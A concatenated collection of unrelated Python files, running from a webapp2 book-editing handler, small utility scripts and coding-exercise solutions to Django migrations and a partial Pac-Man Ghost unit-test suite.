                id_libroCientifico = "ERROR"
            libroCientifico = ndb.Key(urlsafe=id_libroCientifico).get()
            sust = {
                "libroCientifico": libroCientifico
            }
            jinja = jinja2.get_jinja2(app=self.app)
            self.response.write(
                jinja.render_template("librosCientificos/editarLibroCientifico.html", **sust)
            )
        else:
            # Not signed in: back to the home page.
            self.redirect("/")
            return

    def post(self):
        # Read the submitted form fields ("ERROR" is the fallback sentinel).
        titulo = self.request.get("edTitulo", "ERROR")
        autor = self.request.get("edAutor", "ERROR")
        campo = self.request.get("edCampo", "ERROR")
        id_libroCientifico = self.request.get("edIdLibroCientifico", "ERROR")
        # Save the edited data back to the datastore.
        libroCientifico = ndb.Key(urlsafe=id_libroCientifico).get()
        libroCientifico.titulo=titulo
        libroCientifico.autor = autor
        libroCientifico.campo = campo
        libroCientifico.put()
        # Confirmation page with a link back to the book's detail view.
        url = "/verLibroCientifico?id_libroCientifico=" + libroCientifico.key.urlsafe()
        mensaje = "El libro '" + titulo + "' ha sido editado con exito"
        sust = {
            "mensaje": mensaje,
            "url": url
        }
        jinja = jinja2.get_jinja2(app=self.app)
        self.response.write(
            jinja.render_template("mensajeConfirmacion.html", **sust)
        )
# Route /editarLibroCientifico to the handler above.
app = webapp2.WSGIApplication([
    ('/editarLibroCientifico', EditarLibroCientificoHandler)
], debug=True)
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# plt.show()
# Parse a training log named 'losses': lines containing neither '/' nor
# 'model' are assumed to end with a fixed-width loss value in characters
# [-7:-1]; plot the resulting loss-per-epoch curve.
with open('losses') as losses:
    a = losses.readlines()
    # a = [i[-7:-1] for i in a[::2]]
    a = [float(i[-7:-1]) for i in a if '/' not in i and 'model' not in i]
    print(a)
    pd.DataFrame({
        'epoch': np.arange(len(a)),
        'loss': a
    }).plot.line(x='epoch', y='loss', color='r', figsize=(20, 10)).set(title='bzip2d')
#! python3
# multiplyTable.py takes a number(N) from the command line and returns an
# excel spreadsheet with an NxN multiplication table. Every time this program
# is called it will write to the same excel file. If the program is called with
# an N that has been already used, the program will open the file, make the relevant
# sheet the active sheet, save the file and close it.
# If that N has never been used previously then the program will create the NxN table in
# a new sheet, save and close the file. At the end of the program it will launch Excel
# and open the file.
import openpyxl, sys, os
from openpyxl.styles import Font
sys.argv # ['.\multiplyTable.py', N]  -- no-op expression left from debugging
N = sys.argv[1] #string value of N (IndexError if the argument is missing)
Nnum = int(sys.argv[1]) #integer value of N
# Open multiplyTable excel workbook.
workbook = openpyxl.load_workbook(r'c:\users\coding\python\scripts\automate\multiplyTable.xlsx')
#Create Bold Font to be appplied.
BoldFont = Font(bold = True)
#Create a list of values from 1 to N
values = list(range(1, Nnum+1)) # values = [1, 2, 3, ..., N]
# Get all sheetnames in workbook.
sheetnames = workbook.sheetnames
# If N is already a sheet then make that sheet
# the active sheet, save and close workbook.
if N in sheetnames:
    sheetindex = workbook.sheetnames.index(N)
    workbook.active = sheetindex
# If N is not already a sheet then create that sheet, title it "N"
# and populate the table.
if N not in sheetnames:
    sheet = workbook.create_sheet(N, 0)
    workbook.active = 0 #Make this sheet the active sheet, since we placed it at index 0 when we made it.
    #ToDo: Enter values for cells in row 1 and Column A as appropriate. Bold these cells.
    #sheet['A'].font = BoldFont
    #sheet['1'].font = BoldFont
    #ToDo: Loop over all the cells multiplying by the appropriate values
    for item in values:
        # Bold row/column headers, then the item*j products in the body.
        sheet.cell(row=1, column=item+1, value='N = ' + str(item))
        sheet.cell(row=1, column=item+1).font = BoldFont
        sheet.cell(row=item+1, column=1, value='N = ' + str(item))
        sheet.cell(row=item+1, column=1).font = BoldFont
        # sheet.cell(row = 2, column = item+1, value=item) #The first row multiplies by 1
        # sheet.cell(row = item+1, column=2, value=item) #The first column multiples by 1
        # The above rows were originally in the for loop but then I realized that they weren't needed.
        for j in values:
            sheet.cell(row=item+1, column=j+1, value = item*j) # This writes the table
#Save and close workbook.
workbook.save(r'c:\users\coding\python\scripts\automate\multiplyTable.xlsx')
workbook.close()
# ToDo : Launch excel and open file with relevant sheet active.
os.chdir(r'c:\users\coding\python\scripts\automate')
os.system('start excel.exe multiplyTable.xlsx')
|
#!/usr/bin/env python3
import sys
import subprocess
# Create a new sudo-capable user, taking the name from the CLI argument or
# an interactive prompt. Must run with privileges to call adduser/usermod.
if len(sys.argv) > 1:
    name = sys.argv[1]
else:
    # BUG FIX: raw_input() is Python 2 only; under this file's python3
    # shebang it raised NameError. input() is the Python 3 equivalent.
    name = input('Enter User Name:')
if name == 'root':
    print("Can't do anything with the 'root' user account......Breaking the program")
    sys.exit()
subprocess.call(["adduser", name])
subprocess.call(["usermod", "-aG", "sudo", name])
subprocess.call(["passwd", name])
|
# Read integers until a 0 sentinel, then print them in reverse input order.
n = int(input("Digite um número: "))
lista = list()
# FIX: removed the unused list `a` that was never read or written.
while n != 0:
    lista.append(n)
    n = int(input("Digite um número: "))
# Idiomatic reversed() instead of a backwards range over indices.
for valor in reversed(lista):
    print(valor)
|
"""
Write a python program to find and display the product of three positive integer values based on the rule mentioned below:
It should display the product of the three values except when one of the integer value is 7.
In that case, 7 should not be included in the product and the values to its left also should not be included.
If there is only one value to be considered, display that value itself. If no values can be included in the product, display -1.
+--------------+-----------------+
| Sample Input | Expected Output |
+--------------+-----------------+
| 1, 5, 3 | 15 |
+--------------+-----------------+
| 3, 7, 8 | 8 |
+--------------+-----------------+
| 7, 4, 3 | 12 |
+--------------+-----------------+
| 1, 5, 7 | -1 |
+--------------+-----------------+
"""
#PF-Assgn-15
def find_product(num1, num2, num3):
    """Return the product of the three values, except that a 7 excludes
    itself AND every value to its left. Return -1 when nothing remains.

    Examples: (1,5,3) -> 15, (3,7,8) -> 8, (7,4,3) -> 12, (1,5,7) -> -1.
    """
    values = [num1, num2, num3]
    # BUG FIX: the original if/elif ladder mishandled inputs with more than
    # one 7 (e.g. (3, 7, 7) returned 7 instead of -1). Per the rule, only
    # the values strictly to the RIGHT of the last 7 participate.
    for i in range(2, -1, -1):
        if values[i] == 7:
            values = values[i + 1:]
            break
    if not values:
        return -1
    product = 1
    for v in values:
        product = product * v
    return product

#Provide different values for num1, num2, num3 and test your program
product = find_product(7, 6, 2)
print(product)
|
# Generated by Django 3.0.6 on 2020-05-22 13:56
from django.db import migrations, models
class Migration(migrations.Migration):
    """Relax several `find`/`lost` fields to optional with defaults.

    NOTE(review): pan_no is declared as an EmailField despite its name and
    default=0 -- looks copy/pasted from an email column; confirm intent
    before building on it.
    """

    dependencies = [
        ('LaF', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='find',
            name='PIN_code',
            field=models.IntegerField(default=0),
        ),
        migrations.AlterField(
            model_name='find',
            name='aadhaar_no',
            field=models.IntegerField(blank=True, default=0, null=True),
        ),
        migrations.AlterField(
            model_name='find',
            name='age',
            field=models.IntegerField(blank=True, default=0, null=True),
        ),
        migrations.AlterField(
            model_name='find',
            name='pan_no',
            field=models.EmailField(blank=True, default=0, max_length=254, null=True),
        ),
        migrations.AlterField(
            model_name='lost',
            name='PIN_code',
            field=models.IntegerField(default=0),
        ),
        migrations.AlterField(
            model_name='lost',
            name='aadhaar_no',
            field=models.IntegerField(blank=True, default=0, null=True),
        ),
        migrations.AlterField(
            model_name='lost',
            name='age',
            field=models.IntegerField(blank=True, default=0, null=True),
        ),
        migrations.AlterField(
            model_name='lost',
            name='pan_no',
            field=models.EmailField(blank=True, default=0, max_length=254, null=True),
        ),
    ]
|
from jinja2 import Template
from moto.ec2.models import ec2_backend
from moto.ec2.utils import resource_ids_from_querystring
class ElasticIPAddresses(object):
    """Stub EC2 Elastic-IP response handlers for moto; every operation is
    declared but intentionally unimplemented so callers get a clear error."""
    def allocate_address(self):
        raise NotImplementedError('ElasticIPAddresses.allocate_address is not yet implemented')

    def associate_address(self):
        raise NotImplementedError('ElasticIPAddresses.associate_address is not yet implemented')

    def describe_addresses(self):
        raise NotImplementedError('ElasticIPAddresses.describe_addresses is not yet implemented')

    def disassociate_address(self):
        raise NotImplementedError('ElasticIPAddresses.disassociate_address is not yet implemented')

    def release_address(self):
        raise NotImplementedError('ElasticIPAddresses.release_address is not yet implemented')
|
import pandas as pd
class Cargo:
    """Simple record holding the attributes of one cargo unit.

    All constructor arguments are stored verbatim; `vin` and `eta`
    presumably identify the vehicle and its estimated arrival -- confirm
    the exact semantics with callers.
    """
    def __init__(self, size, vin, eta, code, plant, dda) -> None:
        self.size = size
        self.vin = vin
        self.eta = eta
        self.code = code
        self.plant = plant
        self.dda = dda
# Generated by Django 2.1.5 on 2019-07-06 00:43
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the obsolete `receiver` field from the Chat model."""

    dependencies = [
        ('chat', '0012_chat_receiver'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='chat',
            name='receiver',
        ),
    ]
|
class Solution:
    def compareVersion(self, version1: str, version2: str) -> int:
        """Compare dotted version strings: 1 if version1 > version2,
        -1 if smaller, 0 if equal (missing parts count as 0)."""
        parts1 = version1.split(".")
        parts2 = version2.split(".")
        # Debug output retained from the original implementation.
        print(parts1, parts2)

        def piece(parts, idx):
            # Treat an absent part as 0 so shorter versions pad implicitly.
            return int(parts[idx]) if idx < len(parts) else 0

        for idx in range(max(len(parts1), len(parts2))):
            left, right = piece(parts1, idx), piece(parts2, idx)
            if left != right:
                return 1 if left > right else -1
        return 0
class Solution:
    def compareVersion(self, version1: str, version2: str) -> int:
        """Compare dotted version strings numerically per component;
        trailing zero components are insignificant."""
        nums1 = [int(part) for part in version1.split('.')]
        nums2 = [int(part) for part in version2.split('.')]
        # Strip trailing zeros so "1.0" == "1"; lexicographic list
        # comparison then matches component-wise numeric comparison.
        while nums1 and nums1[-1] == 0:
            nums1.pop()
        while nums2 and nums2[-1] == 0:
            nums2.pop()
        if nums1 == nums2:
            return 0
        return 1 if nums1 > nums2 else -1
# HSV Calibration Code
import cv2
import numpy as np
def nothing(x):
    """No-op callback required by cv2.createTrackbar's signature."""
    return None
# Open the default camera and create the control window with HSV trackbars.
camera = cv2.VideoCapture(0)
cv2.namedWindow('Filtered Video')
h_lower, s_lower, v_lower = 0, 0, 0
h_upper, s_upper, v_upper = 255, 255, 255
# creating track bars (OpenCV 8-bit HSV hue tops out at 179)
cv2.createTrackbar('h_lower', 'Filtered Video', h_lower, 179, nothing)
cv2.createTrackbar('s_lower', 'Filtered Video', s_lower, 255, nothing)
cv2.createTrackbar('v_lower', 'Filtered Video', v_lower, 255, nothing)
cv2.createTrackbar('h_upper', 'Filtered Video', h_upper, 179, nothing)
cv2.createTrackbar('s_upper', 'Filtered Video', s_upper, 255, nothing)
cv2.createTrackbar('v_upper', 'Filtered Video', v_upper, 255, nothing)
while True:
    (grabbed, frame) = camera.read()
    if not grabbed:
        break
    hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
    # Pull the current slider positions every frame.
    h_lower = cv2.getTrackbarPos('h_lower', 'Filtered Video')
    s_lower = cv2.getTrackbarPos('s_lower', 'Filtered Video')
    v_lower = cv2.getTrackbarPos('v_lower', 'Filtered Video')
    h_upper = cv2.getTrackbarPos('h_upper', 'Filtered Video')
    s_upper = cv2.getTrackbarPos('s_upper', 'Filtered Video')
    v_upper = cv2.getTrackbarPos('v_upper', 'Filtered Video')
    lower_set = np.array([h_lower, s_lower, v_lower])
    upper_set = np.array([h_upper, s_upper, v_upper])
    # Keep only pixels inside the selected HSV range.
    mask = cv2.inRange(hsv, lower_set, upper_set)
    res = cv2.bitwise_and(frame, frame, mask=mask)
    cv2.imshow('fff', res)
    k = cv2.waitKey(5) & 0xFF
    if k == 27:  # ESC quits
        break
# BUG FIX: the original called cap.release(), but the capture object is
# named `camera` -- that line raised NameError on exit.
camera.release()
cv2.destroyAllWindows()
|
import inspect
import sys
from .cloud_fraction import cloud_fraction # noqa
from .fractal_dimension import fractal_dimension # noqa
from .objects import * # noqa
from .open_sky import open_sky # noqa
from .orientation import orientation # noqa
def _find_mask_functions():
    """
    Look through the functions available in this module and return all the ones
    that look like they operate on object masks
    """

    def _accepts_mask(candidate):
        # A "mask function" is simply one whose signature has a `mask` parameter.
        return "mask" in inspect.signature(candidate).parameters

    found = {}
    for fn_name, fn in inspect.getmembers(sys.modules[__name__], inspect.isfunction):
        if not fn_name.startswith("_") and _accepts_mask(fn):
            found[fn_name] = fn
    return found


ALL_METRIC_FUNCTIONS = _find_mask_functions()
|
import unittest
from katas.kyu_6.alternating_loops import combine
class CombineTestCase(unittest.TestCase):
    """Tests for combine(): round-robin interleave of any number of lists,
    with leftovers from longer inputs appended in order."""
    def test_equals(self):
        # Equal lengths: strict alternation.
        self.assertEqual(combine(['a', 'b', 'c'], [1, 2, 3]),
                         ['a', 1, 'b', 2, 'c', 3])

    def test_equals_2(self):
        # Second list longer: its tail follows the interleaved prefix.
        self.assertEqual(combine(['a', 'b', 'c'], [1, 2, 3, 4, 5]),
                         ['a', 1, 'b', 2, 'c', 3, 4, 5])

    def test_equals_3(self):
        # Four lists of varying lengths.
        self.assertEqual(combine(
            ['a', 'b', 'c'], [1, 2, 3, 4, 5], [6, 7], [8]),
            ['a', 1, 6, 8, 'b', 2, 7, 'c', 3, 4, 5])
|
from backpack.extensions.module_extension import ModuleExtension
class FirstOrderModuleExtension(ModuleExtension):
    """Base class for module extensions whose backpropagate step produces
    nothing (returns None), so no extra quantities flow to earlier modules."""
    def backpropagate(self, ext, module, g_inp, g_out, bpQuantities):
        # Nothing to pass backwards for these extensions.
        return None
|
try:
from tkinter import *
except:
from Tkinter import *
import sys
sys.path.append('../src/org')
from gameplay import Ghost as gh
from gameplay import Pacman as pm
from gameplay import Wall as w
from maps import Map1
from display import DrawingGenerics
import math
import unittest
class test_Ghost(unittest.TestCase):
    """Unit tests for the Ghost gameplay class.

    The test case itself doubles as the "game" object a Ghost expects:
    the get* helper methods below mimic the game's API so Ghost/Pacman
    instances can be constructed against Map1's specifications.
    """

    def setUp(self):
        # Build a throwaway Tk canvas and populate it with pacman, the
        # four ghosts and the walls described by Map1.
        root = Tk()
        gameCanvas = Canvas(root, width = 200, height = 200)
        gameCanvas.grid(row = 0, column = 0)
        self.ghostSpecs = Map1.getGhostSpecifications()
        self.pacmanSpecs = Map1.getPacmanSpecifications()
        self.pacman = pm.Pacman(self, gameCanvas, self.pacmanSpecs)
        self.wallSpecs = Map1.getWallSpecifications()
        self.ghost1 = gh.Ghost(self, gameCanvas, 1, self.ghostSpecs[0])
        self.ghost2 = gh.Ghost(self, gameCanvas, 2, self.ghostSpecs[1])
        self.ghost3 = gh.Ghost(self, gameCanvas, 3, self.ghostSpecs[2])
        self.ghost4 = gh.Ghost(self, gameCanvas, 4, self.ghostSpecs[3])
        self.dots = [0,0,0,0,0,0,0,0,0,0]
        self.dotsEaten=100
        self.walls = []
        for i in self.wallSpecs:
            self.walls.append(w.Wall(gameCanvas,i))

    # --- game-API stand-ins used by the Ghost/Pacman objects ---

    def getGhosts(self):
        # Ghosts keyed by index, as the real game exposes them.
        _ghostSpecs = {0 : self.ghost1, 1 : self.ghost2, 2 : self.ghost3, 3 : self.ghost4}
        return _ghostSpecs

    def getPacman(self):
        return self.pacman

    def getDots(self):
        return self.dots

    def getDotsEaten(self):
        return self.dotsEaten

    def getWalls(self):
        return self.walls

    # --- actual tests ---

    def test_initGame(self):
        # A freshly initialised ghost is stopped with no direction set.
        self.ghost1.initGame()
        self.assertFalse(self.ghost1.started)
        self.assertFalse(self.ghost1.left)
        self.assertFalse(self.ghost1.right)
        self.assertFalse(self.ghost1.up)
        self.assertFalse(self.ghost1.down)

    def test_start(self):
        #Move ghost to arbitrary location
        self.ghost1.xCenter=0
        self.ghost1.yCenter=10
        #Ghost should be moved back to start
        self.ghost1.start()
        self.assertEqual(self.ghost1.xCenter,14*DrawingGenerics.TILE_SIZE)
        # NOTE(review): xCenter is asserted twice; the second check was
        # probably meant to be yCenter — confirm the ghost's starting
        # y-coordinate before changing this assertion.
        self.assertEqual(self.ghost1.xCenter,14*DrawingGenerics.TILE_SIZE)

    def test_restart(self):
        self.ghost1.restart()
        self.assertEqual(self.ghost1.dotLimit,230)
        self.assertFalse(self.ghost1.started)
        #Current coordinates check
        self.assertEqual(self.ghost1.toggleChaseScatter,6 * DrawingGenerics.CYCLES_PER_SECOND)

    def test_started_(self):
        # Starting direction depends on the ghost's colour:
        # red/orange go left, cyan/pink go right.
        self.ghost1.left=False
        self.ghost1.right=False
        self.ghost1.color = 'red'
        self.ghost1.started_()
        self.assertTrue(self.ghost1.left)
        self.assertFalse(self.ghost1.right)
        self.ghost1.left=False
        self.ghost1.right=False
        self.ghost1.color = 'cyan'
        self.ghost1.started_()
        self.assertFalse(self.ghost1.left)
        self.assertTrue(self.ghost1.right)
        self.ghost1.left=False
        self.ghost1.right=False
        self.ghost1.color = 'pink'
        self.ghost1.started_()
        self.assertFalse(self.ghost1.left)
        self.assertTrue(self.ghost1.right)
        self.ghost1.left=False
        self.ghost1.right=False
        self.ghost1.color = 'orange'
        self.ghost1.started_()
        self.assertTrue(self.ghost1.left)
        self.assertFalse(self.ghost1.right)
        self.assertTrue(self.ghost1.started)

    def test_eat(self):
        # Eating a frightened ghost scores 200 points.
        self.assertEqual(self.ghost1.eat(),200)

    def test_chase(self):
        self.ghost1.chase()
        self.assertEqual(self.ghost1.color,DrawingGenerics.GHOST_COLOR[1])
        self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Chase'])
        self.assertEqual(self.ghost1.speed,1.0 * DrawingGenerics.PIXEL)
        self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Chase'])

    def test_scatter(self):
        self.ghost1.scatter()
        self.assertEqual(self.ghost1.color,DrawingGenerics.GHOST_COLOR[1])
        self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Scatter'])
        self.assertEqual(self.ghost1.speed,1.0 * DrawingGenerics.PIXEL)
        self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Scatter'])

    def test_returnToPen(self):
        # An eaten ghost turns grey, speeds up and heads for the pen.
        self.ghost1.returnToPen()
        self.assertEqual(self.ghost1.color,"grey")
        self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Eaten'])
        self.assertEqual(self.ghost1.speed,2 * DrawingGenerics.PIXEL)
        self.assertEqual(self.ghost1.destX,14)
        self.assertEqual(self.ghost1.destY,14.5)

    def test_fright(self):
        # Frightened ghosts slow down for the given number of cycles.
        self.ghost1.fright(10)
        self.assertEqual(self.ghost1.color,DrawingGenerics.GHOST_FRIGHT_COLOR[1])
        self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Fright'])
        self.assertEqual(self.ghost1.speed,0.62 * DrawingGenerics.PIXEL)
        self.assertEqual(self.ghost1.frightCycles,10)

    def test_isInTunnel(self):
        #Should return True
        self.ghost1.xCenter = 0*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
        self.ghost1.yCenter = 18*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
        self.assertTrue(self.ghost1.isInTunnel())
        self.ghost1.xCenter = 24*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
        self.ghost1.yCenter = 18*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
        self.assertTrue(self.ghost1.isInTunnel())
        #Should return False
        self.ghost1.xCenter = 0*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
        self.ghost1.yCenter = 17.9*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
        self.assertFalse(self.ghost1.isInTunnel())
        self.ghost1.xCenter = 22*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
        self.ghost1.yCenter = 18*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
        self.assertFalse(self.ghost1.isInTunnel())
        self.ghost1.xCenter = 6*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
        self.ghost1.yCenter = 18*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
        self.assertFalse(self.ghost1.isInTunnel())
        self.ghost1.xCenter = 12*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
        self.ghost1.yCenter = 18*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
        self.assertFalse(self.ghost1.isInTunnel())

    def test_reverseDirection(self):
        # Reversing flips left<->right and up<->down.
        self.ghost1.left=True
        self.ghost1.right=False
        self.ghost1.up=False
        self.ghost1.down=False
        self.ghost1.reverseDirection()
        self.assertTrue(self.ghost1.right)
        self.assertFalse(self.ghost1.left)
        self.ghost1.reverseDirection()
        self.assertTrue(self.ghost1.left)
        self.assertFalse(self.ghost1.right)
        self.ghost1.left=False
        self.ghost1.right=False
        self.ghost1.up=True
        self.ghost1.down=False
        self.ghost1.reverseDirection()
        self.assertTrue(self.ghost1.down)
        self.assertFalse(self.ghost1.up)
        self.ghost1.reverseDirection()
        self.assertTrue(self.ghost1.up)
        self.assertFalse(self.ghost1.down)

    def test_toggleColor(self):
        # Fright colours alternate between the two flash colours.
        self.ghost1.color = DrawingGenerics.GHOST_FRIGHT_COLOR[1]
        self.ghost1.toggleColor()
        self.assertEqual(self.ghost1.color,DrawingGenerics.GHOST_FRIGHT_COLOR[2])
        self.ghost1.toggleColor()
        self.assertEqual(self.ghost1.color,DrawingGenerics.GHOST_FRIGHT_COLOR[1])

    def test_toggleState(self):
        #We will check these values to make sure parts of toggleState have worked
        self.ghost1.left=True
        self.ghost1.right=False
        self.ghost1.up=False
        self.ghost1.down=False
        self.ghost1.stateFlag = DrawingGenerics.GHOST_STATE['Chase']
        self.ghost1.state = DrawingGenerics.GHOST_STATE['Scatter']
        self.ghost1.toggleState()
        #Expected that ghost1.stateFlag is now Scatter
        self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Scatter'])
        self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Scatter'])
        self.assertTrue(self.ghost1.left)
        self.assertFalse(self.ghost1.right)
        self.ghost1.toggleState()
        #Expected change in direction
        self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Chase'])
        self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Chase'])
        self.assertTrue(self.ghost1.right)
        self.assertFalse(self.ghost1.left)
        self.ghost1.left=True
        self.ghost1.right=False
        self.ghost1.up=False
        self.ghost1.down=False
        self.ghost1.stateFlag = DrawingGenerics.GHOST_STATE['Scatter']
        self.ghost1.state = DrawingGenerics.GHOST_STATE['Chase']
        self.ghost1.toggleState()
        #Expected that ghost1.stateFlag is now Scatter
        self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Chase'])
        self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Chase'])
        self.assertTrue(self.ghost1.left)
        self.assertFalse(self.ghost1.right)
        self.ghost1.toggleState()
        #Expected change in direction
        self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Scatter'])
        self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Scatter'])
        self.assertTrue(self.ghost1.right)
        self.assertFalse(self.ghost1.left)

    def test_process(self):
        #Check for scatter mode
        self.ghost1.toggleChaseScatterCycle = 5
        self.ghost1.toggleChaseScatter = 5
        self.ghost1.frightCycles = 100
        self.ghost1.state = DrawingGenerics.GHOST_STATE['Scatter']
        self.ghost1.process()
        self.assertEqual(self.ghost1.toggleChaseScatter,4)
        self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Scatter'])
        #Check for chase mode
        self.ghost1.toggleChaseScatterCycle = 5
        self.ghost1.toggleChaseScatter = 5
        self.ghost1.frightCycles = 100
        self.ghost1.state = DrawingGenerics.GHOST_STATE['Chase']
        self.ghost1.process()
        self.assertEqual(self.ghost1.toggleChaseScatter,4)
        self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Chase'])
        #Check for toggle, both ways
        self.ghost1.toggleScatterCycle = 7
        self.ghost1.toggleChaseScatter = 0
        self.ghost1.frightCycles = 100
        self.ghost1.state = DrawingGenerics.GHOST_STATE['Chase']
        self.ghost1.process()
        self.assertEqual(self.ghost1.toggleChaseScatter,7)
        self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Scatter'])
        self.ghost1.toggleChaseCycle = 20
        self.ghost1.toggleChaseScatter = 0
        self.ghost1.frightCycles = 100
        self.ghost1.state = DrawingGenerics.GHOST_STATE['Scatter']
        self.ghost1.process()
        self.assertEqual(self.ghost1.toggleChaseScatter,20)
        self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Chase'])
        #Check for frightened mode, before flashing
        self.ghost1.toggleChaseScatterCycle = 5
        self.ghost1.toggleChaseScatter = 5
        self.ghost1.frightCycles = 100
        self.ghost1.state = DrawingGenerics.GHOST_STATE['Fright']
        self.ghost1.process()
        self.assertEqual(self.ghost1.toggleChaseScatter,4)
        self.assertEqual(self.ghost1.frightCycles,99)
        #Check for frightened mode, flashing
        self.ghost1.toggleChaseScatterCycle = 5
        self.ghost1.toggleChaseScatter = 5
        self.ghost1.frightCycles = 40
        self.ghost1.state = DrawingGenerics.GHOST_STATE['Fright']
        self.ghost1.process()
        self.assertEqual(self.ghost1.toggleChaseScatter,4)
        #In tunnel
        self.ghost1.xCenter = 0
        self.ghost1.yCenter = 280
        self.ghost1.process()
        self.assertTrue(self.ghost1.isInTunnel())
        self.assertEqual(self.ghost1.speed,0.5 * DrawingGenerics.PIXEL)

    def test_setNextDirection(self):
        self.ghost1.destX=14*DrawingGenerics.TILE_SIZE
        self.ghost1.destY=14*DrawingGenerics.TILE_SIZE
        self.ghost4.destX=14*DrawingGenerics.TILE_SIZE
        self.ghost4.destY=14*DrawingGenerics.TILE_SIZE
        #Ghost 1 should only be able to move right
        self.ghost1.setNextDirection()
        self.assertTrue(self.ghost1.right)
        #Ghost 4 should only be able to move left or right at the beginning
        self.ghost4.setNextDirection()
        self.assertTrue(self.ghost4.left or self.ghost4.right)

    def test_shortestDistance(self):
        dirDict = { 'left': 1, 'right': 2, 'up': 3, 'down': 4 }
        #nextDir should be left
        self.assertEqual(self.ghost1.shortestDistance(dirDict,10,16),"left")
        #nextDir should be right
        self.assertEqual(self.ghost2.shortestDistance(dirDict,16,18),"right")
        #nextDir should be up
        self.assertEqual(self.ghost3.shortestDistance(dirDict,17,15),"up")
        #nextDir should be down
        self.assertEqual(self.ghost4.shortestDistance(dirDict,13,16),"down")

    def test_distance(self):
        #Check that a distances are calculated correctly
        self.assertEqual(self.ghost1.distance(0,0,3,4),5)
        self.assertEqual(self.ghost1.distance(0,0,1,1),math.sqrt(2))

    def test_destinationTile(self):
        #Ghost 1, in chase mode, follows inky's logic
        self.ghost1.state=DrawingGenerics.GHOST_STATE['Chase']
        self.pacman.currDir='left'
        rX,rY = self.ghost4.inTile()
        dX,dY = self.ghost1.destinationTile()
        pX,pY = self.getPacman().inTile()
        pX = pX-2
        g1X,g1Y = (rX+2*(pX-rX),rY+2*(pY-rY))
        self.assertEqual((dX,dY),(g1X,g1Y))
        self.ghost1.state=DrawingGenerics.GHOST_STATE['Chase']
        self.pacman.currDir='up'
        rX,rY = self.ghost4.inTile()
        dX,dY = self.ghost1.destinationTile()
        pX,pY = self.getPacman().inTile()
        pX,pY = (pX-2,pY-2)
        g1X,g1Y = (rX+2*(pX-rX),rY+2*(pY-rY))
        self.assertEqual((dX,dY),(g1X,g1Y))
        #Ghost 2, in chase mode, follows clyde's logic
        self.ghost2.state=DrawingGenerics.GHOST_STATE['Chase']
        self.pacman.currDir='right'
        dX,dY = self.ghost2.destinationTile()
        pX,pY = self.getPacman().inTile()
        pX = pX+4
        self.assertEqual((dX,dY),(pX,pY))
        self.ghost2.state=DrawingGenerics.GHOST_STATE['Chase']
        self.pacman.currDir='up'
        dX,dY = self.ghost2.destinationTile()
        pX,pY = self.getPacman().inTile()
        pX,pY = (pX-4,pY-4)
        self.assertEqual((dX,dY),(pX,pY))
        #Ghost 3, in chase mode, follows pinky's logic
        self.ghost3.state=DrawingGenerics.GHOST_STATE['Chase']
        #Ghost 3 is far from pacman (arbitrary coordinates for ghost and pacman, and are sufficiently far from one another)
        self.ghost3.xCenter = 0
        self.ghost3.yCenter = 0
        self.pacman.xCenter = 200
        self.pacman.yCenter = 200
        dX,dY = self.ghost3.destinationTile()
        pX,pY = self.getPacman().inTile()
        self.assertEqual((dX,dY),(pX,pY))
        #(Ghost 3 targets pacman)
        #Ghost 3 is close to pacman
        self.ghost3.xCenter = 50
        self.ghost3.yCenter = 50
        self.pacman.xCenter = 55
        self.pacman.yCenter = 55
        dX,dY = self.ghost3.destinationTile()
        self.assertEqual((dX,dY),(0.5,34.5))
        #(Ghost 3 returns to his corner)
        #Ghost 4, in chase mode, follows blinky's logic
        self.ghost4.state=DrawingGenerics.GHOST_STATE['Chase']
        dX,dY = self.ghost4.destinationTile()
        pX,pY = self.getPacman().inTile()
        self.assertEqual((dX,dY),(pX,pY))
        #Ghost 1, in scatter mode, targets bottom right corner
        self.ghost1.state=DrawingGenerics.GHOST_STATE['Scatter']
        dX,dY = self.ghost1.destinationTile()
        self.assertEqual((dX,dY),(27.5,34.5))
        #Ghost 2, in scatter mode, targets bottom left corner
        self.ghost2.state=DrawingGenerics.GHOST_STATE['Scatter']
        dX,dY = self.ghost2.destinationTile()
        self.assertEqual((dX,dY),(2.5,0.5))
        #Ghost 3, in scatter mode, targets top left corner
        self.ghost3.state=DrawingGenerics.GHOST_STATE['Scatter']
        dX,dY = self.ghost3.destinationTile()
